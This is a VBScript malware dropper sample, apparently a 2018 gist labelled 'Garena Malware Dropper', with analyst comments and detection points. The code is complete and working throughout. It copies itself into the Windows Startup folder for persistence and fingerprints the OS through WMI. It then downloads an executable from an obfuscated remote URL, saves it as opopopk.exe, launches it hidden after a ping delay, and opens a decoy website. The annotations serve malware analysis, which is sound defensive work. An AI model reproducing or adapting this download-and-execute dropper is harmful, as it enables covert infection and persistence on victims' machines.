Garena Malware Dropper (2018/03/03)
' ---------------------------------------------------------------------------
' Analyst annotation of a VBScript dropper sample (see gist title above).
' Behaviour as visible in this listing, in execution order:
'   1. Copies itself into the user's Startup folder as "r.vbe" (persistence).
'   2. Ensures C:\programdata\ exists.
'   3. Queries the OS caption via WMI and branches on "XP".
'   4. Downloads a payload over HTTP (URL assembled from percent-encoded
'      fragments), writes it to disk as opopopk.exe and launches it hidden
'      after a ping-based delay.
'   5. Opens facebook.com as a decoy.
' Detection points: wscript.exe writing a .vbe into %APPDATA%\...\Startup,
' wscript.exe issuing an HTTP request (MSXML2.XMLHTTP) and then writing a
' PE file under C:\WINDOWS\web or C:\ProgramData, and wscript.exe spawning
' "cmd /c ... ping -n 10 127.0.0.1 && start <exe>".
' Do not execute outside an isolated analysis environment.
' ---------------------------------------------------------------------------
Dim Wsh
Set Wsh = Wscript.CreateObject("Wscript.Shell")
Dim Objectfs
Set Objectfs = CreateObject("Scripting.FileSystemObject")
set fso = createobject("scripting.filesystemobject")
set ws = createobject("wscript.shell")
' pt = <Startup folder>\ ; this is the persistence location.
pt = ws.specialfolders("startup") & "\"
' Handle to the currently running script (the dropper itself).
set file = fso.getfile(wscript.scriptfullname)
' Persistence: only install if Startup\r.vbe is not already present.
' The Then-branch is intentionally empty; all work happens in Else.
If Objectfs.FileExists(pt & "r.vbe") Then
else
' Re-creates the same objects already created above (redundant; likely
' copy-paste from a template).
set fso = createobject("scripting.filesystemobject")
set ws = createobject("wscript.shell")
pt = ws.specialfolders("startup") & "\"
set file = fso.getfile(wscript.scriptfullname)
' Copy this script into Startup, then rename the copy to r.vbe.
file.copy pt
Set fs2=fso.GetFile(pt & file.name)
fs2.Name="r.vbe"
End if
' Ensure c:\programdata\ exists, creating each path segment in turn.
' (Used as the drop directory on the non-XP branch below.)
a="c:\programdata\"
set fso=createobject("scripting.filesystemobject")
str="\"
getpath=split(a,str)
for i= 1 to ubound(getpath)
path=path & str &getpath(i)
if not fso.folderexists(getpath(0)& str &path)then
fso.createfolder(getpath(0)& str &path)
end if
next
' Errors from here on are silently ignored.
On Error Resume Next
' OS fingerprinting via WMI: read Win32_OperatingSystem.Caption.
' (Flag 48 is commonly wbemFlagReturnImmediately|wbemFlagForwardOnly - TODO confirm.)
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem",,48)
For Each objItem in colItems
strVer = objItem.Caption
Next
' Branch on whether the caption contains "XP". Both branches are identical
' except for the drop path (C:\WINDOWS\web\ vs C:\ProgramData\).
If InStr(1, strVer, "XP") <> 0 Then
on error resume next
' String-splitting obfuscation of COM ProgIDs:
'   "Wscrip"+"t.ShElL"      -> WScript.Shell   (process launch)
'   "MsxMl2"+".xMlH"+"Ttp"  -> MSXML2.XMLHTTP  (HTTP download)
'   "ADODB.S"+"tre"+"am"    -> ADODB.Stream    (binary write to disk)
uiUIGYurufUYFTY=".xMlH"
IOHgytufTUIGUIio="t.ShElL"
tyfyfdrtDRETyuTYFTYdrt="tre"
Set UIyugFTR6Ty=CreateObject("Wscrip"+IOHgytufTUIGUIio)
Set GYUGutfRTFRdtgtyg = CreateObject("MsxMl2"+uiUIGYurufUYFTY+"Ttp")
Set HYUgrdRTESwswect=CreateObject("ADODB.S"+tyfyfdrtDRETyuTYFTYdrt+"am")
' Payload URL is built from percent-encoded fragments ("%7"/"%6" prefixes
' plus one hex digit each). Concatenated and percent-decoded, the fragments
' below spell out the IoC hxxp://www[.]fzfz123[.]usa[.]cc/images.gif
' (decoded by hand from this listing; re-verify before use as an IoC).
ffrTDERerser="http:"
hyuTYFtybYDT="//"
UJIhufFYVyvhbJNhijn="%7"
ht="GET"
JUIyugvfYVFTvh="%6"
tTYrtg="A"+JUIyugvfYVFTvh+"6"+UJIhufFYVyvhbJNhijn+"A%31%32%33%2E"+UJIhufFYVyvhbJNhijn+"5"+UJIhufFYVyvhbJNhijn+"3"
SsSfesds=UJIhufFYVyvhbJNhijn+"7"+UJIhufFYVyvhbJNhijn+"7"+UJIhufFYVyvhbJNhijn+"7%2E"+JUIyugvfYVFTvh+"6"+UJIhufFYVyvhbJNhijn
OUgtydRT=JUIyugvfYVFTvh+"9"+JUIyugvfYVFTvh+"D"+JUIyugvfYVFTvh+"1"+JUIyugvfYVFTvh+"7"+JUIyugvfYVFTvh+"5"+UJIhufFYVyvhbJNhijn+"3."
tUIhyug=JUIyugvfYVFTvh+"1%2E"+JUIyugvfYVFTvh+"3"+JUIyugvfYVFTvh+"3/"
com="web"
ghidw="WINDOWS"
tyFRTDR=+JUIyugvfYVFTvh+"7"+JUIyugvfYVFTvh+"9"+JUIyugvfYVFTvh+"6"
abve=" /c "
cbve="C:\"
' Synchronous GET (third argument 0 = not async) of the assembled URL.
GYUGutfRTFRdtgtyg.Open ht,ffrTDERerser+hyuTYFtybYDT+SsSfesds+tTYrtg+tUIhyug+OUgtydRT+tyFRTDR,0
GYUGutfRTFRdtgtyg.Send()
' ADODB.Stream: Mode=3 (read/write), Type=1 (binary); write the raw
' response body and save it as C:\WINDOWS\web\opopopk.exe.
HYUgrdRTESwswect.Mode=3
HYUgrdRTESwswect.Type=1
HYUgrdRTESwswect.Open()
HYUgrdRTESwswect.Write(GYUGutfRTFRdtgtyg.responseBody)
tf="\"
ewisiw="set &&ping -n 10"
SM32=cbve+ghidw+tf+com+tf+"opopopk.exe"
HYUgrdRTESwswect.sAVetOFiLe SM32
' Launch: "cmd /c set &&ping -n 10 127.0.0.1 &&start <exe>", window style 0
' (hidden). The loopback ping is a crude ~10 s delay before execution.
eiqq="cmd"
mhg=eiqq+abve+ewisiw+" 127.0.0.1 &&start "+SM32
UIyugFTR6Ty.run (mhg),0
else
' Non-XP branch: same download-and-run sequence; drop path is
' C:\ProgramData\opopopk.exe (the directory created earlier).
on error resume next
uiUIGYurufUYFTY=".xMlH"
IOHgytufTUIGUIio="t.ShElL"
tyfyfdrtDRETyuTYFTYdrt="tre"
Set UIyugFTR6Ty=CreateObject("Wscrip"+IOHgytufTUIGUIio)
Set GYUGutfRTFRdtgtyg = CreateObject("MsxMl2"+uiUIGYurufUYFTY+"Ttp")
Set HYUgrdRTESwswect=CreateObject("ADODB.S"+tyfyfdrtDRETyuTYFTYdrt+"am")
' Same percent-encoded URL fragments as the XP branch.
ffrTDERerser="http:"
hyuTYFtybYDT="//"
UJIhufFYVyvhbJNhijn="%7"
ht="GET"
JUIyugvfYVFTvh="%6"
tTYrtg="A"+JUIyugvfYVFTvh+"6"+UJIhufFYVyvhbJNhijn+"A%31%32%33%2E"+UJIhufFYVyvhbJNhijn+"5"+UJIhufFYVyvhbJNhijn+"3"
SsSfesds=UJIhufFYVyvhbJNhijn+"7"+UJIhufFYVyvhbJNhijn+"7"+UJIhufFYVyvhbJNhijn+"7%2E"+JUIyugvfYVFTvh+"6"+UJIhufFYVyvhbJNhijn
OUgtydRT=JUIyugvfYVFTvh+"9"+JUIyugvfYVFTvh+"D"+JUIyugvfYVFTvh+"1"+JUIyugvfYVFTvh+"7"+JUIyugvfYVFTvh+"5"+UJIhufFYVyvhbJNhijn+"3."
tUIhyug=JUIyugvfYVFTvh+"1%2E"+JUIyugvfYVFTvh+"3"+JUIyugvfYVFTvh+"3/"
ghidw="ProgramData"
tyFRTDR=+JUIyugvfYVFTvh+"7"+JUIyugvfYVFTvh+"9"+JUIyugvfYVFTvh+"6"
abve=" /c "
cbve="C:\"
GYUGutfRTFRdtgtyg.Open ht,ffrTDERerser+hyuTYFtybYDT+SsSfesds+tTYrtg+tUIhyug+OUgtydRT+tyFRTDR,0
GYUGutfRTFRdtgtyg.Send()
HYUgrdRTESwswect.Mode=3
HYUgrdRTESwswect.Type=1
HYUgrdRTESwswect.Open()
HYUgrdRTESwswect.Write(GYUGutfRTFRdtgtyg.responseBody)
tf="\"
ewisiw="set &&ping -n 10"
SM32=cbve+ghidw+tf+"opopopk.exe"
HYUgrdRTESwswect.sAVetOFiLe SM32
eiqq="cmd"
mhg=eiqq+abve+ewisiw+" 127.0.0.1 &&start "+SM32
UIyugFTR6Ty.run (mhg),0
End If
' Decoy: open a legitimate site so the victim sees "expected" activity.
Set objShell = CreateObject("Wscript.Shell")
objShell.Run("http://www.facebook.com")